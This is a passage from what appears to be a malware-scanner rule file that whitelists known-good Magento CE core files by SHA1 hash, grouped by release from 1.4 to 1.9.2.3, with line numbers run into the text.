"a61f87f2c29575ca5d31933daa9bb4e0c35cc7c5" or // 
app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 187 | hash.sha1(0, filesize) == "ec5cfd2435a4fb385d5fb3f43249618091d4b1f2" or // app/code/core/Mage/Dataflow/Model/Profile.php 188 | hash.sha1(0, filesize) == "34c3ae9b10cc1e3dcd346406daad972de2a9f53a" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 189 | hash.sha1(0, filesize) == "f1d50bfd4dc8cf023bb2467928ee07b8ca277f1f" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 190 | hash.sha1(0, filesize) == "04e7dc316cd70f8851e27d2f1ee094003c79191d" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 191 | hash.sha1(0, filesize) == "75c0b78644517ab431cd2067aeb4c9b606fe5629" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 192 | hash.sha1(0, filesize) == "3bb4df77cbfd37d70c24621a0e1819059bd06a74" or // app/design/frontend/default/iphone/template/customer/widget/dob.phtml 193 | hash.sha1(0, filesize) == "2a78243468ee200ee3933d03fc2b52f375516b24" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 194 | hash.sha1(0, filesize) == "3133a72daf3fe6f51778fa89e07f7c7c07de9493" or // lib/Varien/Data/Form/Element/Editor.php 195 | hash.sha1(0, filesize) == "5129a7555895007ecc2a1975fcd91cf2d0d8abe1" or // lib/Varien/File/Uploader.php 196 | hash.sha1(0, filesize) == "e4269e6d47cbb5c606e916e1fcd80c1acc131e55" or // lib/Zend/Locale/Format.php 197 | 198 | /* Magento CE 1.4.1.1 */ 199 | 200 | /* Magento CE 1.4.2.0 */ 201 | hash.sha1(0, filesize) == "47576a4be1d4f450436ceef01f4d76561b49c10f" or // app/code/community/Find/Feed/Model/Import.php 202 | hash.sha1(0, filesize) == "b5503689bc6a42a1223019adfde7680b643bba92" or // app/code/core/Mage/Core/Model/Layout.php 203 | hash.sha1(0, filesize) == "428645582e2c32c01ce4fbed0efc865a86cc1ce1" or // app/code/core/Mage/Dataflow/Model/Profile.php 204 | hash.sha1(0, filesize) == "2ed7f109642dbfec32434d722caea3ba919b78b1" or // 
app/code/core/Mage/GoogleBase/Model/Service/Item.php 205 | hash.sha1(0, filesize) == "59eca17b433527c716e39a79c2a6624267039031" or // lib/Mage/Autoload/Simple.php 206 | hash.sha1(0, filesize) == "aac39b74fe44c73becdbc55e1e13a07834f446ae" or // lib/Varien/Pear.php 207 | hash.sha1(0, filesize) == "be6109e866f11177febd1a4adff8b8f15dcd7d4b" or // lib/Varien/Data/Form/Element/Editor.php 208 | hash.sha1(0, filesize) == "382fb51970f59f803508285ee8d2c4a2616ecc73" or // lib/Varien/Data/Form/Element/Multiline.php 209 | hash.sha1(0, filesize) == "9c0c57a9d2df145526cbde494e00f0798ec40379" or // lib/Varien/File/Uploader.php 210 | hash.sha1(0, filesize) == "da6dbd6d8183b366dbf5ec1b4da8a064375452e3" or // lib/Zend/Session.php 211 | hash.sha1(0, filesize) == "af5d43214068dd919d70a61b66fb4b1761957b24" or // lib/Zend/View/Helper/HeadScript.php 212 | hash.sha1(0, filesize) == "4d80fe8363e9d04cb962d50b3d0d88f039673a0d" or // lib/Zend/Validate/File/MimeType.php 213 | hash.sha1(0, filesize) == "11a78fc89381ba37849a82529b024c656d9025d4" or // lib/Zend/Locale/Format.php 214 | hash.sha1(0, filesize) == "7d086827328b7494bc490fb7206b3366d2c38e6f" or // lib/Zend/Locale/Data.php 215 | hash.sha1(0, filesize) == "63283e976d5fea1f63c18e8a6793b3a4ab9d71d4" or // lib/Zend/Soap/Client.php 216 | hash.sha1(0, filesize) == "1e9a01653ac90098c876b77e97e3670589ec3787" or // lib/Zend/Serializer/Adapter/PhpCode.php 217 | hash.sha1(0, filesize) == "d75195ee5082cf62a51e1055e421ee8d4a2143b8" or // lib/Zend/Amf/Server.php 218 | hash.sha1(0, filesize) == "078401aeda210badab9ef4fc083a1b75292b2207" or // lib/Zend/Session/Exception.php 219 | hash.sha1(0, filesize) == "29ab7310cee069c1f6d76b53ec66a9edbd723de9" or // lib/Zend/Date/DateObject.php 220 | hash.sha1(0, filesize) == "20bf0974e247e157a44f3582ec075ea0d151e446" or // lib/Zend/Ldap/Converter.php 221 | 222 | /* Magento CE 1.5.0.0 */ 223 | hash.sha1(0, filesize) == "ca04390be3a2fb9125cc190f85eb6dc1ec99166a" or // downloader/Maged/Connect.php 224 | hash.sha1(0, 
filesize) == "d8521a4b500badf5608b9eefb1e7d4923d5c099c" or // downloader/lib/Mage/Autoload/Simple.php 225 | hash.sha1(0, filesize) == "542d271f564aa019943e9b5c9e82ba752da3807b" or // app/code/community/Find/Feed/Model/Import.php 226 | hash.sha1(0, filesize) == "ec386833ed576acee6a0cffae893d727b4fe20f5" or // app/code/core/Mage/ImportExport/Model/Import/Adapter.php 227 | hash.sha1(0, filesize) == "fe81b3452d5224fa03d122348ebd25fd6cf2bfe2" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 228 | hash.sha1(0, filesize) == "7e847df572b49a30b533058488d47256243281c5" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 229 | hash.sha1(0, filesize) == "b8ec0477409e6a3cf29ef2f5a51dd18457630fc5" or // app/code/core/Mage/XmlConnect/Block/Adminhtml/Mobile/Form/Element/Image.php 230 | hash.sha1(0, filesize) == "3e4338a076ef79058f5a069a7c07c8c14aae5655" or // app/code/core/Mage/Core/Model/Translate/Inline.php 231 | hash.sha1(0, filesize) == "4d4913c1f71c8b77ce1748fc1ed2f9c7af26f0e9" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 232 | hash.sha1(0, filesize) == "6409bc5c48b2676c7592c490363f8dbda40f8cb6" or // lib/Varien/Data/Form/Element/Image.php 233 | hash.sha1(0, filesize) == "8bb683957e1d561f60a0c311f532543b16d70946" or // lib/Varien/File/Uploader.php 234 | hash.sha1(0, filesize) == "87cf0da9bfefa24aa8984a902200cf3c073d57af" or // lib/Zend/View/Helper/HeadScript.php 235 | hash.sha1(0, filesize) == "3686394c1369d3c95d2d4eb6e55af54f2c217edb" or // lib/Zend/Validate/File/MimeType.php 236 | hash.sha1(0, filesize) == "51f42d5712d78d3949e625bdbb1164fa5df21f37" or // lib/Zend/Locale/Format.php 237 | hash.sha1(0, filesize) == "8fee7dddf97ee0020242555eb7b4a210ee0c5ddf" or // lib/Zend/Locale/Data.php 238 | hash.sha1(0, filesize) == "997e8decd0cd34c4a5740adb8a54ab1192227a72" or // lib/Zend/Soap/Client.php 239 | hash.sha1(0, filesize) == "72077639b329556270e1cb8f67607e3a12818ecc" or // 
lib/Zend/Form/Decorator/HtmlTag.php 240 | hash.sha1(0, filesize) == "168196bd79743a1726e6f9c51b8cded7f379071c" or // lib/Zend/Serializer/Adapter/PhpCode.php 241 | hash.sha1(0, filesize) == "de086d6b6b7bd97c8cc02a5e71711625b5aa21f4" or // lib/Zend/Amf/Server.php 242 | hash.sha1(0, filesize) == "1f44a0506e92fbc4b93f630f2d4e269144e34c98" or // lib/Zend/Date/DateObject.php 243 | 244 | /* Magento CE 1.5.0.1 */ 245 | 246 | /* Magento CE 1.5.1.0 */ 247 | hash.sha1(0, filesize) == "1c1573c2f8fb87dc6d7fa4a86f9bed3966ab1559" or // app/code/core/Mage/Dataflow/Model/Profile.php 248 | hash.sha1(0, filesize) == "e219e7d6a09ace697b471c1dff1e818a089e7bdb" or // lib/Varien/Data/Form/Element/Multiline.php 249 | hash.sha1(0, filesize) == "1348243a2ef778d294f135f1eabd9b447a68276a" or // lib/Varien/File/Uploader.php 250 | 251 | /* Magento CE 1.6.0.0 */ 252 | hash.sha1(0, filesize) == "7c7c0e823b7149758466ce1c46b31cc752098981" or // downloader/Maged/Connect.php 253 | hash.sha1(0, filesize) == "f5355295887c7c920faec7a6649a3b0e501ed562" or // downloader/lib/Mage/Autoload/Simple.php 254 | hash.sha1(0, filesize) == "0d90dfcdadc2385454d6989c89e5619284d06a22" or // app/code/community/Find/Feed/Model/Import.php 255 | hash.sha1(0, filesize) == "ff8e400bbceefa8fb6ffdd7b6ca7c19424c3724c" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 256 | hash.sha1(0, filesize) == "0cc50b85016c0a281d463eaea15d9a60c8dde353" or // app/code/core/Mage/ImportExport/Model/Import/Adapter.php 257 | hash.sha1(0, filesize) == "c7b1ac6cb88d57a1ecc9f1228530422418092734" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 258 | hash.sha1(0, filesize) == "6f04c753855b120250fb93c3f18120439bac61a3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 259 | hash.sha1(0, filesize) == "3ec46431440bbdd6dc012ec88ba8b2abb254a07a" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 260 | hash.sha1(0, filesize) == 
"08cd39581eebdce66eba747d99564f92aecd81bb" or // app/code/core/Mage/Core/Model/Translate.php 261 | hash.sha1(0, filesize) == "73d6f4ad968b6597969a846607c7fc4951da21f8" or // app/code/core/Mage/Core/Model/Layout.php 262 | hash.sha1(0, filesize) == "faf6a7d584a991040910bc3c1b75b1b953749dac" or // app/code/core/Mage/Core/Model/Translate/Inline.php 263 | hash.sha1(0, filesize) == "533d7cf5e90b1d7531d869a733c28a1d7b96c087" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Category.php 264 | hash.sha1(0, filesize) == "8df77b8fb1861b3a7d56dea614e329072170c4d4" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Product.php 265 | hash.sha1(0, filesize) == "c4fe77c103e8133560598cddd3f5b5d6d51000ef" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 266 | hash.sha1(0, filesize) == "e7d5e027d6d8d5aed1b7e6e2bb9c4823a244d81c" or // app/code/core/Mage/Dataflow/Model/Profile.php 267 | hash.sha1(0, filesize) == "13f835ff37292f0f9cc6cf291c2d2c0bf3c6584d" or // app/code/core/Mage/Adminhtml/Model/Url.php 268 | hash.sha1(0, filesize) == "910a7ffd9e47fa7323afb954504e7f665959d0dc" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 269 | hash.sha1(0, filesize) == "9eddbdda8933a43af895db0198b11212ec0f9ca9" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 270 | hash.sha1(0, filesize) == "ead5c7a448033fdad1d4a6703d4ffc3a46bd3b08" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 271 | hash.sha1(0, filesize) == "35fca9cb6bce8e10563f014a74e6832055f374be" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 272 | hash.sha1(0, filesize) == "1881995b15ffff36404400667af328064456caba" or // lib/Varien/Pear.php 273 | hash.sha1(0, filesize) == "a2c4546364372caac2b6565f6b74987df5e54e4e" or // lib/Varien/File/Uploader.php 274 | 275 | /* Magento CE 1.6.1.0 */ 276 | 277 | /* Magento CE 1.6.2.0 */ 278 | 279 | /* Magento CE 1.7.0.0 */ 280 | hash.sha1(0, filesize) == 
"e37b356ab26b4d7acd052139f0ed063a4e242065" or // downloader/lib/Mage/Autoload/Simple.php 281 | hash.sha1(0, filesize) == "a675fe32e519294e608a11e0e7ad26c6c0ee39e9" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 282 | hash.sha1(0, filesize) == "21396b418469673c1092f0ab94633f188d7baf15" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 283 | hash.sha1(0, filesize) == "dde0fd41aff7a751e69528f12eecdcb79261239a" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 284 | hash.sha1(0, filesize) == "948a6b886901cae250b4314f7ec1880b5bcd98ee" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 285 | hash.sha1(0, filesize) == "80b6306a8752dde8cebe44334f1c30e60509cae4" or // app/code/core/Mage/Core/Model/Translate.php 286 | hash.sha1(0, filesize) == "64c3885b5a8fc86af29bd6f08976d2da87727ddc" or // app/code/core/Mage/Core/Model/Layout.php 287 | hash.sha1(0, filesize) == "20a1cd0eb6f110bb98f35f2499614cb442959462" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Category.php 288 | hash.sha1(0, filesize) == "8b45c11270942e161b69e71e49e1595dc388ad8f" or // app/code/core/Mage/Sitemap/Model/Resource/Catalog/Product.php 289 | hash.sha1(0, filesize) == "2af8367688d9131c9fb5c6c749f92d46dd216d3e" or // app/code/core/Mage/Dataflow/Model/Profile.php 290 | hash.sha1(0, filesize) == "a81945dcfc4fcf2e464669f02fc03bc09b231420" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 291 | hash.sha1(0, filesize) == "0b4971706ce32b91df9649f61c0dbe52fa3c025b" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 292 | hash.sha1(0, filesize) == "b665a86b2caabb9efcf1c2013268cae2ec52dae5" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 293 | hash.sha1(0, filesize) == "9f7c657e9cb4caeeef7fbdf7658bcb93fb7f504e" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 294 | hash.sha1(0, filesize) == 
"9e002eb833e32a1d8bf0e05b8f817d8e3788e6d3" or // lib/Varien/Autoload.php 295 | hash.sha1(0, filesize) == "744c53013d70f0ef8d60a4e6ff532d50aba2c798" or // lib/Varien/File/Uploader.php 296 | hash.sha1(0, filesize) == "53ad2d03a76e1460b5c0ce75b1bcee79d5f96e5a" or // js/tiny_mce/tiny_mce_jquery_src.js 297 | hash.sha1(0, filesize) == "5d709e1db0c76651ff2e04084349b41ec8ac349e" or // js/tiny_mce/tiny_mce_prototype_src.js 298 | hash.sha1(0, filesize) == "26684d59fecefd29796e1ce35b9c8fde4001f80d" or // js/tiny_mce/tiny_mce_src.js 299 | 300 | /* Magento CE 1.7.0.1 */ 301 | hash.sha1(0, filesize) == "a5dce2ba92736f0d1e33769d697b1777ddbadd98" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 302 | 303 | /* Magento CE 1.7.0.2 */ 304 | 305 | /* Magento CE 1.8.0.0 */ 306 | hash.sha1(0, filesize) == "f4bfc9f458bdadf338482afddaa80530b1eb668f" or // cron.php 307 | hash.sha1(0, filesize) == "78f63461659a1a430b9e95910e3ad40daee0d7c4" or // downloader/lib/Mage/Autoload/Simple.php 308 | hash.sha1(0, filesize) == "47bc9993a2ae847ee1baded420bc864a9e2add82" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 309 | hash.sha1(0, filesize) == "2ea72c5b3160e44b1ab812e40a002fd3ffb47e01" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 310 | hash.sha1(0, filesize) == "6053ccb397bd3237772c950e0c926f852a3231ed" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 311 | hash.sha1(0, filesize) == "c5359f0b869bfc7d07d669dea5996fecdfb01ad7" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 312 | hash.sha1(0, filesize) == "444479b4ce40a0c8e592d68a87c971934008a245" or // app/code/core/Mage/Core/Model/Translate.php 313 | hash.sha1(0, filesize) == "90f041175c2cea0f0663afa30f588fe4dad5b123" or // app/code/core/Mage/Core/Model/Layout.php 314 | hash.sha1(0, filesize) == "87feb95a759d68eb37cbed972425276586ae02bf" or // app/code/core/Mage/Dataflow/Model/Profile.php 315 | hash.sha1(0, 
filesize) == "51b39b52f31bd6376a99979ad1235ad1f5e4cb94" or // app/code/core/Mage/Adminhtml/Model/Url.php 316 | hash.sha1(0, filesize) == "2e2be1472eafa5164fb0c5926942ca9bfe670d2f" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 317 | hash.sha1(0, filesize) == "f0cfbfa1652bc187ad818823d9021507aa483610" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 318 | hash.sha1(0, filesize) == "44034f3de404aff9ca5b4bd177814ccf1a488a91" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 319 | hash.sha1(0, filesize) == "58fe31ecb9fed1ea5e1ec6e5b9cbd7339000be21" or // lib/Varien/File/Uploader.php 320 | 321 | /* Magento CE 1.8.1.0 */ 322 | hash.sha1(0, filesize) == "2a72c042ddf3151bc189a1a1abee570911e5b90f" or // cron.php 323 | 324 | /* Magento CE 1.9.0.0 */ 325 | hash.sha1(0, filesize) == "beb8fa0b00d09fe07c4250b57638207d2baf58a9" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 326 | hash.sha1(0, filesize) == "e49b97bd3d87338e45952d3c14110f8c58ff2944" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 327 | hash.sha1(0, filesize) == "0845429e8d7ec4db23031fa8567712b620716ce3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 328 | hash.sha1(0, filesize) == "030222d390a79416396528a36d00bd8782f42b44" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 329 | hash.sha1(0, filesize) == "c20d1956300ab8a7c7249327fad8460e26bfe5a4" or // app/code/core/Mage/Core/Model/Translate.php 330 | hash.sha1(0, filesize) == "57b95e9be59894c37bc07a8ef8ec90b9599c1b4b" or // app/code/core/Mage/Core/Model/Layout.php 331 | hash.sha1(0, filesize) == "882cf7e8f1edef0e29af45c97243918e41ac8ed8" or // app/code/core/Mage/Dataflow/Model/Profile.php 332 | hash.sha1(0, filesize) == "d8cda57af7063c1727837dd8da9db48a67258126" or // app/code/core/Mage/Adminhtml/Model/Url.php 333 | hash.sha1(0, filesize) == 
"1f80886d6860858d4b67d021c374a167a4452a9f" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 334 | hash.sha1(0, filesize) == "6e7249490d2717c9b8472fbd045c7603752bf09d" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 335 | hash.sha1(0, filesize) == "3edb4a845c40b7bd58a3c420c643fd1848d29a4a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 336 | hash.sha1(0, filesize) == "56a365dec8f4871ff38b8d157557cd44c99a0f58" or // lib/Magento/Autoload/Simple.php 337 | hash.sha1(0, filesize) == "257622b757cb7a54fd2ca5248e1a36ebcd804cc0" or // lib/Zend/Session.php 338 | hash.sha1(0, filesize) == "6b5a32540833318714c783e546219d1ec7ff1d4c" or // lib/Zend/Tool/Project/Provider/Test.php 339 | hash.sha1(0, filesize) == "0f4d1b153641f3e38355e7b6e77d2ef0795d502a" or // lib/Zend/Validate/File/MimeType.php 340 | hash.sha1(0, filesize) == "d22c5d0518d02777887e16d52b8505aaa7f4165d" or // lib/Zend/Locale/Format.php 341 | hash.sha1(0, filesize) == "474e85d94ee74b3837b48ab9b0dcec24eb834974" or // lib/Zend/Locale/Data.php 342 | hash.sha1(0, filesize) == "8fa67d2a0a56159c7c45031d11fab3f8050c526d" or // lib/Zend/Soap/Client.php 343 | hash.sha1(0, filesize) == "ca6aec4ee5075ab676dc0834beebb16671535650" or // lib/Zend/Service/WindowsAzure/CommandLine/Scaffolders/DefaultScaffolder.phar 344 | hash.sha1(0, filesize) == "834db01a738509c1e104f97d5cd900c7b10d7205" or // lib/Zend/Service/WindowsAzure/CommandLine/Scaffolders/DefaultScaffolder/resources/PhpOnAzure.Web/resources/WebPICmdLine/Microsoft.Web.PlatformInstaller.UI.dll 345 | hash.sha1(0, filesize) == "a635e99c23f43b460511a7017cbde6020bb100b9" or // lib/Zend/Serializer/Adapter/PhpCode.php 346 | hash.sha1(0, filesize) == "843ff3ac422f19112c787b2ef63ae4e3341b6d16" or // lib/Zend/Amf/Server.php 347 | hash.sha1(0, filesize) == "0c76cda5268b7c886f075491ab2e0857edf1f30c" or // lib/Zend/Date/DateObject.php 348 | hash.sha1(0, filesize) == 
"08da1d6d302bd33f27081c3198ceeb6d902dfd00" or // lib/Zend/Ldap/Converter.php 349 | 350 | /* Magento CE 1.9.0.1 */ 351 | 352 | /* Magento CE 1.9.1.0 */ 353 | hash.sha1(0, filesize) == "5cc804265e9d69991e22aa92c82663fd03b1e9b8" or // app/code/core/Mage/ImportExport/Model/Import/Uploader.php 354 | hash.sha1(0, filesize) == "4866408493f2f83827ef0fd1d7fce1802d219cf3" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 355 | hash.sha1(0, filesize) == "5b534fb113a2a6e555bcb09d80576c8d92cc45f0" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 356 | hash.sha1(0, filesize) == "f3b3eceb9c06bc59f23387c462b7817480efe1af" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 357 | hash.sha1(0, filesize) == "3d560f39b99e47b72ede84e7d6ac69e198c22098" or // app/code/core/Mage/Core/Model/Translate.php 358 | hash.sha1(0, filesize) == "e782aee39e228d0fbb0bb894b740961c156eef5a" or // app/code/core/Mage/Core/Model/Layout.php 359 | hash.sha1(0, filesize) == "0c882e8ac2d88a395fc14da2b1eab649bf1be462" or // app/code/core/Mage/Dataflow/Model/Profile.php 360 | hash.sha1(0, filesize) == "91135f179fdbee4ac3806abba6120db0b73e6dbc" or // app/code/core/Mage/Adminhtml/Model/Url.php 361 | hash.sha1(0, filesize) == "07c71d2a531adb843589c60f42f940c4f3fe7dbe" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 362 | hash.sha1(0, filesize) == "71b10a4a0cd8956f30e5ce13a91e6bbd74fa5421" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 363 | hash.sha1(0, filesize) == "410f0ba42bc4ffa69cf140768352368a3d09f73a" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 364 | hash.sha1(0, filesize) == "6be0dccd49f9878749ef9a85963e7f8d75b4d40d" or // lib/Magento/Autoload/Simple.php 365 | hash.sha1(0, filesize) == "a36be33cb14a5803bf0f4a6e188f6a0b16077853" or // lib/Varien/Autoload.php 366 | hash.sha1(0, filesize) == 
"ad57a755258346b526d694d2bc515b4171d16ea7" or // lib/Zend/Session.php 367 | hash.sha1(0, filesize) == "9d370bde321e7d936025773e0b3a8f7f01882f67" or // lib/Zend/Tool/Project/Provider/Test.php 368 | hash.sha1(0, filesize) == "62f77a3c4e2ea1ce8d00fe62a8065c3c2a892118" or // lib/Zend/Validate/File/MimeType.php 369 | hash.sha1(0, filesize) == "b8b3dbb3fb548a70b7ffb249862cb20c2e8826eb" or // lib/Zend/Locale/Format.php 370 | hash.sha1(0, filesize) == "f2c2a12241d8d571acafeb4ddfb7920c4b41ce9b" or // lib/Zend/Locale/Data.php 371 | hash.sha1(0, filesize) == "761b8134d057822aebd9b25599759593a62b59a8" or // lib/Zend/Soap/Client.php 372 | hash.sha1(0, filesize) == "32a5acd82a2e9163ca05a125c359e7f751ae55f3" or // lib/Zend/Serializer/Adapter/PhpCode.php 373 | hash.sha1(0, filesize) == "5699310fb6d6e827050e152f99a085b88b05e488" or // lib/Zend/Amf/Server.php 374 | hash.sha1(0, filesize) == "8864eef8ceda89c902d033be651a9353e3cf5e73" or // lib/Zend/Date/DateObject.php 375 | hash.sha1(0, filesize) == "ebe09e979a43c009fbea2d65ce01ab7941cfa49a" or // js/tiny_mce/tiny_mce_jquery_src.js 376 | hash.sha1(0, filesize) == "f7ce9a2c3cddf03aa2069b3a4faaa4b4011a8571" or // js/tiny_mce/tiny_mce_prototype_src.js 377 | hash.sha1(0, filesize) == "77abde98292c0e2ea60c3cb796f4eda512eaa575" or // js/tiny_mce/tiny_mce_prototype.js 378 | hash.sha1(0, filesize) == "10de582f689b58d046d08da55fdfbf90c08524f5" or // js/tiny_mce/tiny_mce_jquery.js 379 | hash.sha1(0, filesize) == "e4473407525b5d622aaaa3f626946c6ef3ce3c1a" or // js/tiny_mce/tiny_mce.js 380 | hash.sha1(0, filesize) == "818d1825aef53ec014568c10181d75e88491f9d0" or // js/tiny_mce/tiny_mce_src.js 381 | hash.sha1(0, filesize) == "9539b243cb405912b865b0db36b312a9fe44d510" or // js/tiny_mce/plugins/paste/editor_plugin_src.js 382 | 383 | /* Magento CE 1.9.1.1 */ 384 | hash.sha1(0, filesize) == "1a5df06c6ba7b717825db8d55e2ad3db8c834637" or // cron.php 385 | hash.sha1(0, filesize) == "abbd120b50f030bdd61e2ac14511d549cfac72f9" or // 
app/code/core/Mage/ImportExport/Model/Import/Uploader.php 386 | hash.sha1(0, filesize) == "02bfd222251a3b35bff55c213a6e8126a2e60784" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Customer.php 387 | hash.sha1(0, filesize) == "0c11c755b73650408655af02ea304786bbafbe9d" or // app/code/core/Mage/ImportExport/Model/Export/Entity/Product/Type/Abstract.php 388 | hash.sha1(0, filesize) == "f8fcce0810ed8610fdc3d3dfa164d95835f84d93" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 389 | hash.sha1(0, filesize) == "3734e1824e4ad9f0516344427f4cc246ae00776a" or // app/code/core/Mage/Core/Model/Translate.php 390 | hash.sha1(0, filesize) == "5f65da3c0df60ac43befc42ea990639da9a89039" or // app/code/core/Mage/Core/Model/Layout.php 391 | hash.sha1(0, filesize) == "947e91de8554856c73ade2a1c9e6fecb725a26d3" or // app/code/core/Mage/Dataflow/Model/Profile.php 392 | hash.sha1(0, filesize) == "4079c07a1059350c4d1e5a0bd3ad955cc4d02738" or // app/design/frontend/default/iphone/template/catalog/product/view/media.phtml 393 | hash.sha1(0, filesize) == "2b2d9c9ebe2144fe52d0e0be0cca17ea1285dbe7" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 394 | hash.sha1(0, filesize) == "45ea8b1dbffc1166987d889780fa9e990c02836f" or // app/design/adminhtml/default/default/template/notification/toolbar.phtml 395 | hash.sha1(0, filesize) == "3b404a87888f839158b19e748c71bad0b0908605" or // lib/Magento/Autoload/Simple.php 396 | hash.sha1(0, filesize) == "e810f8d584b0ad3e43d7ab15fda1c666a466df85" or // lib/Mage/Autoload/Simple.php 397 | hash.sha1(0, filesize) == "da92179998e43536f4439c3fdc0eb51cc4db96b7" or // lib/Varien/Pear.php 398 | hash.sha1(0, filesize) == "fb0b0bf5cef93f8c817dad5872ce245f3d96d32d" or // lib/Varien/Autoload.php 399 | hash.sha1(0, filesize) == "782c7d8f1a2b06e5da59d0862766c6ba2b25f28e" or // lib/Varien/Data/Form/Element/Gallery.php 400 | hash.sha1(0, filesize) == "d6fdfc01c4644292bd08f73f19f2dc539536de2c" or // 
lib/Varien/Data/Form/Element/Multiline.php 401 | hash.sha1(0, filesize) == "c7d2ea2c3bd0ba9854630e3e63a950765c14f1bf" or // lib/Varien/File/Uploader.php 402 | hash.sha1(0, filesize) == "24dc54b5710bc353e5b3f493af8d3f18e99a2c3a" or // lib/Varien/Db/Tree.php 403 | 404 | /* Magento CE 1.9.2.0 */ 405 | hash.sha1(0, filesize) == "f9cc4c1a62436372f245fdda6a0a37e7df4a9cdb" or // cron.php 406 | hash.sha1(0, filesize) == "dd414df47f283a6db73cef174ab8e526512b64b8" or // lib/Zend/Tool/Project/Provider/Test.php 407 | hash.sha1(0, filesize) == "b8519e3973a2a0504942f31f905f7a6e9c533f63" or // lib/Zend/Validate/File/MimeType.php 408 | hash.sha1(0, filesize) == "89765ac6cbadcd08f693cd9f7557e42d90380313" or // lib/Zend/Locale/Format.php 409 | hash.sha1(0, filesize) == "72517e19f04eda76e203868603b3b5132d4ef9d7" or // lib/Zend/Locale/Data.php 410 | hash.sha1(0, filesize) == "dbc4bbfaecf84eeb4bf5c99c3e359bbbf32803be" or // lib/Zend/Soap/Client.php 411 | hash.sha1(0, filesize) == "b3f0a13af9d17e7ced224584c6447505586fdd1a" or // lib/Zend/Serializer/Adapter/PhpCode.php 412 | hash.sha1(0, filesize) == "a391b6abaf40851177c2a634c894a44a0fdcbd2d" or // lib/Zend/Amf/Server.php 413 | hash.sha1(0, filesize) == "227da1e56588f1d2c02ab5dd81784f1d38a5be5d" or // lib/Zend/Date/DateObject.php 414 | 415 | /* Magento CE 1.9.2.1 */ 416 | 417 | /* Magento CE 1.9.2.2 */ 418 | hash.sha1(0, filesize) == "9283d2576949b018bcc38dd35c28e4bf2d609db1" or // cron.php 419 | hash.sha1(0, filesize) == "66503bf10b6b58265728cc6e9b6d564bf5149bf2" or // lib/Zend/Session.php 420 | hash.sha1(0, filesize) == "0bab49baadf98015bfea963e0d9ae5944bec1233" or // lib/Zend/Locale/Data.php 421 | hash.sha1(0, filesize) == "b58925a24d9201f4efbc0f59782b2b99367ec006" or // lib/Zend/Amf/Server.php 422 | hash.sha1(0, filesize) == "7c00d311a20e650dccf8dff9d2eb346077ff91eb" or // lib/Zend/Date/DateObject.php 423 | 424 | /* Magento CE 1.9.2.3 */ 425 | hash.sha1(0, filesize) == "19dbc4997004bb618bcc7b1e76b572424c7c93d1" or // cron.php 426 | 
